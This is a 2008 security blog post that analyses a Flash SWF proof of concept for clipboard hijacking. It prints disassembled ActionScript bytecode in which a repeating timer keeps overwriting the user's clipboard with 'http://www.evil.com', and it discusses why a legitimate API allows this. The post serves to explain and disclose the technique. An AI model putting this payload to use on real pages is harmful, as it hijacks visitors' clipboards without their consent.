Home > Emerging Threats, Exploits, Malwares, Vulnerability > Clipboard Hijacking SWF PoC

Clipboard Hijacking SWF PoC

Thank God, I’m back …

So, the SWF PoC (proof-of-concept) Clipboard hijacking works in cross-platform (Windows and Mac browser). The sneaky behavior does not exploit any vulnerability instead it uses a legitimate ActionScript as mentioned in my previous post.  Basically, if you refer SWF File Format Specification 9 – SWF 9 introduced ActionScript 3.0 with new DoABC (Do ActionScript Byte Code)  action-definition tags. Like DoAction tags, DoABC defines a series of bytecode to be executed. However, this time DoABC tag run in ActionScript 3.0 virtual machines [For further reading -> VM2 Overview].

From the PoC that was published…

// Defining the symbolclass "test_fla.MainTimeline" into the package
[052]       515 DOABC
class [package]test_fla:MainTimeline extends [package]flash.display:MovieClip, test_fla:MainTimeline, flags=08

{ // test_fla:frame1

constructor ---- [package]test_fla:MainTimeline()
[3 1 10 11 0]
{
getlocal_0
pushscope
getlocal_0
constructsuper 0 params
findpropstrict [package]:addFrameScript
pushbyte 00
getlex [packageinternal]test_fla:frame1
callpropvoid [package]:addFrameScript, 2 params
returnvoid
}
//test_fla:frame1() executes setClip()

method ---- [packageinternal]test_fla:frame1()
[3 1 10 11 0]
{
getlocal_0
pushscope
findpropstrict [package]flash.utils:setInterval
getlex [package]:setClip
pushbyte 01
callpropvoid [package]flash.utils:setInterval, 2 params
returnvoid
}

// setClip() push "http://www.evil.com" users' clipboard
method ---- [package]:setClip()
[2 1 10 11 0]
{
getlocal_0
pushscope
getlex [package]flash.system:System
pushstring "http://www.evil.com"
callpropvoid [package]:setClipboard, 1 params
returnvoid
} }

The interesting part here is not the code, instead the legitimate features and capability that allows it to  cross over boundaries and user systems’ security perimeter making it intrusive, sneaky and potential vector for attackers and malwares.

Should developers must make sure that their processes have their own execution domain?

So, whose fault is this ?

  1. September 22, 2008 at 4:38 pm

    thank you, bro

  2. October 6, 2008 at 12:33 am

    thats for sure, man

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: